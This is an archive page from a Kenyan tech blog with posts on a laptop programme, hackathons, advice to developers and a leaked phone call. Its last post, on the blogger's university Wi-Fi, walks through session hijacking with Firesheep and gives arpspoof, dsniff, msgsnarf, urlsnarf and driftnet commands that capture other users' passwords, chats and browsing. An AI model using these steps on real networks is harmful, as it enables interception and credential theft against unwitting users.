RSS

Category Archives: true stories

Uhuru Kenyatta’s Free Laptop Programme- a techies perspective

So Yesterday <16th April 2013>  I watched as the President iterated that the free laptop programme he promised is still on, to be precise this is what he had to say “6:09 pm Uhuru: My government will deliver on its promise of free laptops for our children starting next year. Our vision is to have laptops availed in future to be assembled locally”. Two things struck me …His time line(next year) and his ambition to have them locally assembled in future. But before I look into either one of his points let me first shed some light into one already existing laptops for primary schools  program.

In Rwanda the supplier  was One Laptop Per Child (OLPC), an American charity linked to  MIT,but this process was plagued with controversy. I will only highlight the techie bits and stay clear of any politics here, the first controversy was when Intel opted out of the program,meaning this computers where to run on another chip-set  The second and the one I was very keen on was the Operating system the machines were running on,the war raged between Open source and Windows based XP. But despite this the computers were indeed supplied later on; the computer was  dubbed the XO laptop and saw Rwanda get 120,000 units,Ghana 10,000,Sierra Leone 5,000.  Read more here>>>

Now coming back to Kenya and looking back at what the president said.The first point was the timeline. The government should indeed not deploy this computers with any rush. I would suggest a whole year before they are made available to any classroom..reason? Well lets face it majority of teachers who will end up using this devices to administer learning to kids have limited computer training. I mean I would imagine the scenario if a teacher in say Nyeri or Siaya just got handed a bunch of devices and told to use in teaching, it would be no easy feat. Second the actual devices themselves….If we choose indeed to administer laptops what Operating system will they run on?

There are only two options here. Windows or and Open Source platform eg Linux. Visiting the OLPC the issue was between exclusive use of open source software for the project  and those in favor made suggestions supporting a move towards adding Windows XP which Microsoft was in the process of porting over to the XO hardware. Microsoft’s Windows XP, however, was not seen by some as a sustainable operating system. Microsoft announced on May 16, 2008, that they had let them have Windows XP for $3 per computer. It would be offered as an option on XO-1 laptops and possibly be able to dual boot alongside Linux. However, no significant deployments elected to purchase Windows licenses.

Assuming this laptops are to indeed run on Windows at $3 per windows licence and assume the first phase sees 500,000 issued. That would mean Microsoft would charge $1,500,000  (120,000,000 KSH).  And since the government aspires to buy  5.86 million computers for kids that would translate to approximately $17,600,000 (1.4 Billion KSH) Just for the OS.The other scenario would be to use a free variant of Linux…and do away with this cost.And assuming that the computers are not going to run on an Intel based chip-set (to reduce cost per unit) then for the performance to be optimal Linux would make more sense. Then going ahead and looking at his suggestion that the computers get manufactured locally it would mean we buy the parts from a cheap source eg. China ship them to Kenya assemble them on an alternate chip-set and a Linux Variant and hand them over to the kids.

But the west would fight this with all their might…..not because they are losing out $17,600,000 , that’s pocket change, but because of a simple mathematical term called extrapolation. If a kid grows up using Linux since class 1 what are the odds that when he/she turns 20 and wants to buy their own computer they will choose Microsoft? This will mean slowly by slowly Microsoft will fade out of Kenya as the OS of choice would be Linux. Asia is a living example of these, kids grew up using Linux and Microsoft is not as big there as it was back in the day.Intel would also loose a large market presence in the country. So if Uhuru were to opt for this then he would be in turn be giving the west a big middle finger.But there would be the issue of Internet connection on these laptops

The other option would be to provide a solar powered tablet instead of a laptop. A simple Android based Kenyan assembled tablet would cost around $30 and would represent the least-expensive solution for bringing computing and, more importantly, internet connectivity, to students in Kenya, tablets of this kind can access data networks using the GPRS  where 3G or 3.75 G is unavailable.With the App bubble at its peak devs would have a fun day driving local online and offline based content for these devises. Data providers e.g Safaricom, Zain,Orange ,YU would see data revenues go up also translating to more Revenue for KRA to take home and job creation.

 
4 Comments

Posted by on April 17, 2013 in 254, code, JKUAT, kenyan clones, legal issues, true stories

 

Tags: , , , ,

Guest Post: UBAYA WA MAHACKATHONS NOWADAYS

Its been a while since I had a Guest Post on my Blog. So when a pal asked whether I could let her do one then you Know a bratha had to say Yes . So here it is {she blogs here if you are curious >>>>}

UBAYA WA MAHACKATHONS NOWADAYS

Been meaning to write this for a while and finally here goes. Ok Im not against competitions but seriously we need to rethink why and how we have these.

Napenda watu wa campo hio si issue but most of the time when you go for these things you will find majority of them there.  Si eti the other guys hawataki pesa but people be too grown for these (as in guys don’t just go for competitions just for the sake, watu wako busy wanacode “fa sustenance” si for pesa ya weekend. Lakini ka doo ni mob sawa). Most of the time you will get those who are on holidays, those who just cleared from school na wamecome kusocialize,  na wengine they just love the experience. Kuna wale huenda to make an extra buck and don’t think beyond the hackathon, then there is a fourth type of guys who have gone there with an intention of meeting the local Tech scene (if wazito watatokea), put what they know to test (coz they actually have initiative to teach themselves real code) and learn from the experienced people (they know there are guys better than them) so as to perhaps create networks for side husle jobs to build their skills.

Now we all know in campo unless you own a business or wewe ni husla you are usually broke so the sound of getting Ksh. Xk in a day sounds very exciting. Now it won’t matter if you actually have any skills or you are willing to do your best to add value to the team but getting the mulla is the focus for you since by mere fact of being in a team hata kama hukudo any, assures you a cut. Then lastly kuna wenye hujiita magurus and they think wanajua kila kitu….wololos!

Now this bunch (know it alls na joyriders) is what is giving competitions a bad name. Manze unaenda hackathon na unakutana na watu wanataka tu doo na they don’t even want to work for it. As in there is a difference between a commercial product and a class assignment and what they want to give is classroom material. When our University students go abroad for internships and the likes if they are doing CS (Computer Science or related stuff) they usually notice the difference I guess it’s the fact that they realize watu wengi wamezoea shoddy job kwa daro as in  “bora nipate marks. Meanwhile as we write Hello world in all languages kuna mtoii amepublish apps kadhaa kwa iOS …ok Moving on.

I think the standards at Hackathons should be raised as in if you tell every Tom Dick and Harry to attend kuna wasee hata even for their own good they don’t learn anything from there since they give minimal or no input. Then it has been noted (relax statistics bado hazijatolewa) that most startups formed by strangers in Hackathons especially mastudents hawajuani  or any other group don’t last beyond that. Only people who know each other well or have worked together and know what everyone else brings to the table have been successful.

Don’t get me wrong there are many gifted students shout out to UON, Strath, JKUAT, Egerton, Baraton, KEMU,  and the other Kenyan Campos’s but seriously saa zingine ……..Sawa that all!

 
 

Tags: , , ,

Similarity between Prostitution and Coding/Programming in Kenya

I wrote the title to this post and couldn’t help but laugh at first. I mean ave written some really weird posts but Dude this one just has to be the one. Any way let me state my case:  Similarity between Prostitution and Coding/Programming in Kenya.

Let me begin with a shallow be it obscure definition of both: Prostitution is the act of selling one’s body in a sexual way for profit. It’s one of the oldest professions around. Coding is the development of software products that solve problems related to day to day activities. This is usually done for profit {or not} but let’s just stick with the profit aspect in this context. So how are the two similar you may ask!! Well I have been watching episodes of Hung back to back and the thought crossed my Mind…My God Prostitution and coding are similar.  Hung is a series about some boy toy that has to screw women for money simply for survival, but soon ends up doing it for the money. Here is a link >>>> Let me paint a picture of similarity between the above two professions.

In the world of Business the key to making major mullah is some form of Advertising. It doesn’t matter if its false advertising or true advertising the more you/ the product are known the more you are likely to get many customers and hence more mullah for you. Kapish…? The same applies to Hookers,  it doesn’t matter how prettya hooker is…If you don’t have  a connect then you don’t get mullah…or you will really have to put in work in order to barely get any customers. And don’t forget you may get a customer who refuses to pay once kazi imeisha simply because you are minus a pimp to chase them down. Still with me? Sawa wacha tuendele… Haya In this world if you don’t have connects and end up on Someones Street then Bitch you gon get your ass kicked.

The converse is also true. You may not be a fly looking mama but based on how good your Pimp is then you end up getting  major mullah .All the while the fly looking girl on the corner is still waiting at around 3am for their first customer. Or dodging the cops (Kanjo) and if the day is bad she will leave with barely anything in her pocket (or Bra!!).So the Key to a hooker getting paid is the pimp. And of course location, location, location.

Haya lets go to coding. A key aspect of coding in Kenya  is making money… (Wait before you start yelling I know some coders are in it for purely for the dev aspect, money aint an issue…That being said lets go ahead) . First there are coders who are just great, so great that they are like the fly hooker who just walks down the street and gets a pick up from some rich guy.0 effort on their side, she just swings her hips, flaunts the goods and viola!! The deal is sealed … the goods advertise themselves; they are few lakini, countable really. These types of coders are the ones who have done really huge projects and their name searches on Google yield impressive results. Cash is impressive also; actually the pay is more than impressive. Major $$$$ ka ching ching .

The second type of coders…the ones with a super pimp…A pimp who will hook them up with Jobs za Nguvu…USD projects…they know Mr.x in this blue chip firm…Mr. y in that other firm…yaani they are more wired than the extension cable in my house. These types of coders are the ones who get calls like “Niaje Msee BBK wants system flani…And they are willing to pay 5000USD if you can deliver it in 1 month”. They push two 4 figure USD projects   in a month. And have egos the size of Thika road.

Then kuna the third type, good coders who have no pimps…These guys have to remain on the corner the whole night…and hope the makeup they spent their last dime on will get them a client. These coders end up with 4 or 5 small jobs all barely 20K each …all jobs are on a tight schedule. 2-5 days deadlines for a 10K gig….the desperation of waiting on the curb makes them concede. If they are unlucky then even the 20 K they were to get paid ends up being stolen from them (Just like the hooker bila a pimp)

Then kuna the fourth type.   The ones who don’t even know where the curb is.  Those are like the pretty hookers who believe that since they are pretty they will end up making mullah. But soon find out that maisha bila pimp ni ngumu kuruka. They end up being facked (for free!!) all the while being lied to that they will be given a great job. Doesn’t matter if you can code in binary or even in some unknown scripting language.  If no one knows you then the most you will get is a lay from your chic (ile ya huruma…nothing kinky or spicy).

That being said…if you are a Kenyan coder…Then slot yourself accordingly. Wacha mimi nikatafute Pimp

 
2 Comments

Posted by on October 29, 2012 in 254, code, kenyan clones, true stories, twitter, weekend

 

Tags: , , ,

TO KENYAN MOBILE DEVELOPERS #Advice

I have noticed this phenomenon with many Kenyan techies/wanna be techies/copy pasting techies/code stealing techies, everyone of them has this app idea they are working on, this awesome idea that will earn them a couple of million like @jmwai or like kina Mbugua Njihia and Steve Mutinda. So you will most of the time find them at iHub pale Kwa green members with their eclipse fired up….writing/copying/downloading code to build up their apps.”Sasa Jaymo nini mbaya na hiyo ?” Nothing really am ok with that, at least they are putting in work ki code…they are helping build that Konza city dream/mirage ….what really pisses me of is do most of them sit down to think what they are coding  before they actually do? Do they analyze the current market, study it well? As Dr.Okello my calculus 3 teacher would have said, do they account for Variable change? Do they have a target Demographic for their M-something solution? Maybe, maybe not!

Back in Undergraduate while doing Mathematics and Comp science at JKUAT we were taught the stages of software design and implementation ,the logical flow in developing software….but this is how this guys are doing it now days:

Techies’ come up with brilliant ideas on their own, and often they have not carried out some form of research to find out who is their user, what does their user need and what then would be an appropriate solution to meet this need?

Techies barely leave their desks when coding, or before they begin coding…what you have is brilliant techies with fantastical ideas that no one uses [after they’ve been developed] because the time was not taken to really understand what issues citizens face…

As if that’s not enough most of the apps put out are poorly done, in all aspects starting from design. This new breed of techies fails to understand that when it comes to design of an app’s interface it begins from a sketchpad and not the IDE!! Ask @martianskills of skyline designs and he will conquer. When it comes to design what is the current norm with these techies? The old school Dashboard layout…this design was launched in Google I/O 2010, 2010!! My friend 2010! But that’s what everyone of them is working with…then you fail to develop proper icons on top of that….you get a cheap looking app, aesthetics my friend go a long way…you just look at this  interface below… and tell me what you think .  ..just plain ugly!!!

<No Image>

Sasa ju you have seen a thwack one..let me show you one by @zacckOS and you will see what a mature interface looks like

and a snapshot from TafutaID:

Secondly: you have your interface…so sasa you are working on functionality, uliskia JSON ndo inatumika and you are all in….umechapa Google search and umepata some code….you slap them all together and viola….functionality achieved….Hata huwezi aibika!! Half of this app developers are just some  guys with kidogo Java knowledge, Kidogo  php, even less C  knowledge and barely any Python at all….you are writing server side code that is so vulnerable to exploit  on Databases you have propped with even more shifty coding….yaani SQL injection is so freaking easy even my 5 year old niece could hack!! Login forms that do not sanitize user inputs…passwords that are not encrypted being stored kwa DB! Au if they are they are all MD5 encrypted bila ata salt…how?? Why!!

Third: Everyone assumes its easy,its like siku hizi kama huna app wewe si mnoma…kama huna entry ume submit wewe ni toast! So everyone has an app….that is freaking great but hold on a minute! Does this breed of devs even watch trends at all? Flash back kiasi let me use my own example Based on  Gogle I/O 2010 I developed KwaRamani…using title bars, dashboard layouts, and themes. Based on Google I/O 2011 I developed TafutaID with support for storing data on cloud and pulling responses back with C2DM…2012 working with google drive….but hawa ma techie wanakuundia a flintstones  app based  on 90’s technology alafu ukiwa kwa lift unaskia wasee wakisema “aaaaiii Android ni rahisi….kitu simple kama JSON encode na HTTP  ndo wasee huona ngumu?” Sawa bratha…endelea kuandika software ya 1999 in the 21st Century

Fourth:  Market…ok app imeisha …finally all those hours of coding have amalgamated into something…you have even showed your ex the app and now she wants you back ju unakaa una bright future ahead! Yes you have that smirk! Ile ya Kanye West “….wait till I get my money right…” But wait a minute….none of your apps are on  the market!! Am not a well established techie, so I can relate to most of this techies not having the $25USD to set up the Android Market account…au Kama uko nayo its in KSH and huna VISA card to pay for the account…so you cant get it to the market….so the app stays kwa comp yako….and two months later your ex /baby mama I looking at you zile za Nyga please. That’s where people fail…kuna many ways to get it out to the masses. Samsung Store is free to upload, good old GetJar  bado iko,remember before Android,IOS na kina Symbian S40 came when Moi was still president and J2ME was the only way…Getjar and Waptrick was the ishh..and it still works so you can upload….watch the trends and kidogo you will learn/earn  and upload to Android Market.

Fifth: No man is an island….as cliché as that may sound its true…and when it comes to code no developer is an island either…ask for help when you get stuck…offer help when you are asked pia…don’t be wale wasee huficha answers kwa exam ati ndo wasee wasicopy (I can think of a couple form my JKUAT days) ….Gain a network sio hapo kwa couch ya ihub pekee. Try and enter competitions not for prize money but more for the exposure you will get and from the people you will meet

PARTING SHOT

Those are just my views, based on what I have observed….moving along swiftly, Last week I was privileged enough to have a long talk with Dele Akinsade- Microsoft Director, Developer Platforms –West, East & Central Africa and Indian Ocean islands…we talked about windows phone development, and I argued with him how Microsoft has not done enough for techies who want to develop on the platform, from the SDK itself to  lowering the price on phones running on this platform to allow penetration into the market. He  told me affordable  feature phones will be launched sometime this year but not running on windows phone 8 but 7.5 .Plus the Windows Phone 8 SDK is out and offers a lot to developers.So if you are a techie you can try and start developing on this platform before the phones arrive and have a niche before the rest.

 
11 Comments

Posted by on June 29, 2012 in 254, code, hack, Humour, true stories

 

Listen up all yee non coding Believers.

OK fine, hii mwaka inaonekana si mbaya, code wise actually… si ati am saying i haven’t gotten any runtime errors or fatal warnings, kwanza jana i had buffer overflows zingine crazy…but just generally. I feel my coding has kinda matured. Let me paint a picture for you: In first year while doing Calculus 2 I had this lecture who was  quite un orthodox, after he had finished teaching all 5 methods of integration he introduced a 6th one :Integration by looking at, this is what he said… in math there comes a time when you just look at a function and figure out how its integrated. This seemed quite the academic fit for my then young mind but a couple of Calculus and ODE lessons later i had gained the mastery, the mastery to stand up to smothing like PDE and not fall into fits of shock….

Back to the present,well code is no different from that integration class of mine, once upon a time you are doing hello world code… then taking baby steps to understand how the core functions work… till you get to a place where you have amassed  code skills and a library that you have created, that you understand and that you apply often in you coding  endevours. You reach a place where you look at code and know whats happening,how to optimize to reduce consumption on vital resources and most importantly how an exploit would be carried out if need to  ever arose and how to prevent said exploit.

Then you grow up a network of people who think,talk and pretty much have obsession for code like you.Anonymous and lulz sec  did IRC but us mere mortals just hang out on twitter or the *ihub,or at whatever place has good wi fi connection and just kick it. People start associating you with certain terms, just as you would idenfiy a guy like Alykhan Satchu with  IPO people now identify with PHP,JSP,java… that kinda thing.

your ka blog is  now getting kitu 320 hits a day with readers showing interst hapa na pale,you are being followed by a sizable number of people pia on twitter…At least wasee wanakuelewa…….. till one day someone has the BALLS to ask a dumb question like “Jaymo kama wewe ni mnoma Android mbona hukushinda Afrinolly last year kwa Google challenge,mbona hukushinda MsemaKweli last year kwa App circus….” the same guy goes on to rant “…. what do you have to show for all that code talk?”

Well hapo ndipo the Merian blood in me starts boiling up and i may decide to go all wordy on you and probably give you   abit of tongue whoop ass. But to what avail… to have you read it back from what ever location you are and you would be like”silikuambia…” Hell no Jaymo is bigger than that.

I have great  mentors in my coding life,mentors who will tell you that as soon as you make that prize money, hed to coasto and do tequilla on the white sand, you will be digging a coding grave for yourself because some kid will be on his HP coding while you sucking tities in lambada….is that the reason why i dont do coding competitions, well not exactly, id rather do a whole week of coding for a client, present excellent workmanship after its all said and done… watch the client awe in amazment, that look of gratitude in his face is orgasmic… then walk away with say X amount, knowing that the client will most likely give me a referal to someone else and someone else,na polepole jaymo ata pata dough.. than just winning a compe, getting the media and online coverage that will see you think umefika, ukuwe relaxed, pole pole ukuwe lazy. then mwisho mwisho you  fall out.

Personally id rather put in work on an idea i feel will earn me long term mulla than short term fame, a project that will change and impact the lives of people than an app that will probably not even make it to the mainstream market.Kenya is currently ripe.. Gava imeanza kufanya kazi, Bitange Ndemo is doing his thing,mpaka telecos flani hapo imeacha utiaji na ina allow coders to do their thing uliza Iddsalim…

What am trying to say is i got my thing going on… i don’t wake up in the morning and start typing lines of code for nothing…natafuta hella mwanangu and the best way i know how to is the one am currently doing… so coding fests in 2012 are a huge NO but ukiskia client anadai coding work halla at you boy.

 

 
1 Comment

Posted by on January 18, 2012 in code, JKUAT, Reflections, true stories, twitter

 

Tags: , , , ,

Muturi & Nicole Booty call.

Am not going to talk mob about that call rather i will just re blog what IddSalim wrote on his blog about the possible source of the Audio leak : So here is a snippert of what he had to say:

“………………The question the few Kenyans with a brain are asking is this. “Hiyo simu waliiskiza aje?”. The question the few coders/security analysts are asking is this. “Have phone-call interception equipment finally come to Kenya? Do we, FINALLY, have hackers who can do what Salim has been talking about, akatukanwa? Are our worst fears finally here? Should we be worried?”. So, I decided to demystify the source of the clip…………

I tried looking at the Audio file in MP3 using Nyquist-Shannon sampling theorem and other audio analysis models and the results were outstanding. The recording came out as a perfectly flowing person-to-person convo. The convo took place and could not have been cooked. And so, I came up with these scenarios.

1 – A telco employee did it

As stated above, it is POSSIBLE and IT HAPPENS that phone call and SMS records can be sold. The question becomes, how comes it was ONLY this call that got out. How idle would a telco employee be, to sift through ALL the GBs of data to get this ONE call? Still, idlers exist. And there is something called luck.

2 – Muturi did it

Using a Smart or Smart-Enuff phone, one can record a phone call. Muturi might have recorded the call (knowingly or just automatically), found it funny as f*u*ck, and decided to share. Nicole would not have shared this. Stupid female pride would not have let her. Muturi would. Stupid male ego would not let him not share. “Muone vile madem hunikufia”.

3 – It was a studio-born viral prank call

High probability too. A ‘real’ phone call can be, unfortunately, manufactured. At the last few seconds of the call, we hear the credit/airtime beep. If a studio call, then this is a specially crafted section to add to LEGITIMACY. Stupid Kenyans must have been heard saying: “Si hata uliskia credit ikikatika. Ni ya ukweli.” How would someone willing to pay a cab and pika nyama not have more than KSHS 16.8 of credit?………….”

You can read his whole thought train here >>>> Or you can click here>>>> to listen to it

 

In my personal opinion,and speaking as a guy i think Muturi must have recorded it on his phone, you dont even need a smart phone to do that,even an Ideot can pull that one,then to prove a point to his boys/pub mates/ex clandes,leaked it and waited for it to go viral and judging by how desparado nicole sounded, Muturi must have tapped that and moved along.

 

Tags: , , ,

Hacking WI-FI ya JKUAT.

I get scared at times….not of cliche things like of the dark or of being shot by the cops because I come from one of those neighborhoods.What scares me most is cyber attack….This is going to be a tech post so if you  not into that kind of thing please click here>>>>

That being said let me  dive head fist into the contents.I am a wi-fi junkie… I spend more time online than I do with my girlfriend,Wi-fi has been good to me(when its not that time of the month when it gets all hormonal)…So why am I afraid???

Well lets just take it from the top…I share an access point with some 100 or so guys at peak and 4-5 at off peak,the commonest site visited is Facebook, YouTube and probably Yahoo(I didn’t mention Google coz it goes without say).Peak time is usually from 7-10Pm and off peak ranges from there..The wi-fi network is protected with a  WPA2  security pass and AES encryption format(not TKIP)..The network is behind a proxy server that runs SQUID..and what do we all know about squid??? Squid sacks at HTTPS (ad rather go for an ISA server but then again am not JKUAT,i only go to school there)

Sasa Jaymo ju umetuambia hii yote,how does an attack occur?.kwanza this is purely for educational  purposes.one of  the easiest attacks is using a lilttle known tool called firesheep.Ok firesheep is fa***** easy to use,.Primarily coz its not a stand alone software rather a firefox addon…With this nifty addon you can do a tonne of things to rookie web users…wanna hear like what?

Supposing student x logs on to an acess point say RUNDA wireless connection.The DHCP awards him a renewable 1 hour lease on an IP(all without him knowing) and he establishes an Internet connection.He is just from chatting with this fresha chic who gave him her Facebook handle,so student X wants to snoop…He launches his Mozilla and types the URL,seconds later the login page appears,he logs in and continues doing his thing…pretty standard right???? Well across the yard Hacker X launches his Firesheep and begins this hack..he notices Student X is logged onto Facebook via HTTP instead of HTTPS..and decides to steal his session…does kidogo of this and that….minutes  later he has the exact facebook session as student X..while he is at it he even decides to go through this nygas Inboxes to see if he is still dating that gorgeous chic of his…If thats not scary enough,he goes to Facebook settings,changes the backend Email adress and Facebook password..logs out and kicks Student X out of his own fa**** facebook page….awsome.

How is this being done…session Hijacking…What all WI-FI networks have in common is that people will acess them to browse(daaaaaa) and when they do some one can easily steal unencrypted cookie sessions.session hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server(SQUID in my case)

Hiyo ni moja..next bucket-brigade attack…aka man-in-the-middle-attack.This is what good old wikipedia has to say about bucket bridge attack. This is an attack where the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted      Wi-Fi wireless access point, can insert himself as a man-in-the-middle).

And since am in a good mood today am going to give you a proff of concept that I actually tried out….First Am usually working on a linux distro called Bactrack….(sorry windows slaves,windows cant hack..f*** what you see in the movies).

So open up a shell and get the tools you want primarily we are going to be doing  arpspoof poisoning and so we need to get driftnet and dsniff.

So on bash run:-sudo apt-get install driftnet dsniff. next we enable packetforwading…echo 1>  /proc/sys/net/ipv4/ip_foward   then cat /proc/sys/net/ipv4/ip_foward  this is to allow the traffic on the network to flow via your machine…then we begin the arpspoff poisoning

sudo arpspoof -t <your ip> <router ip>  split your screen and do the reverse sudo arpspoof -t <router ip> <your ip> . And that’s it,you are primarily the man in the middle here.Now you can have fun  with this attack…

an easy one is:

 msgsnarf -i etho, where etho is the name of the network interface..you can listen to all the instant message services running,am talking MSN,gtalk…any instant messanger.so you can watch someone chatting.

urlsnarf -i -etho, Listens to port 8080,80,3128,if you in JKUAT and you use wi-fi then you must know what port 3128 is.This one obviously listens to URL that are being sent.

If you are intersted in password then we can go back to dsniff and do that

sudo dsniff -i eth0, this will listen to any password being sent.

Now if you want to see what Student X is viewing online,kama picha hivi then we switch back to driftnet

sudo drifnet -i -eth0,  this will give you a visualization of activity on the network

Bassss thats why i get afraid…but no biggie…In my next post i will tell you how to protect yourself from and of the above attacks….wacha nikasomee CAT ya fluidmechanics

 
7 Comments

Posted by on September 28, 2011 in hack, INTERNSHIP, JKUAT, true stories

 

Tags: , , ,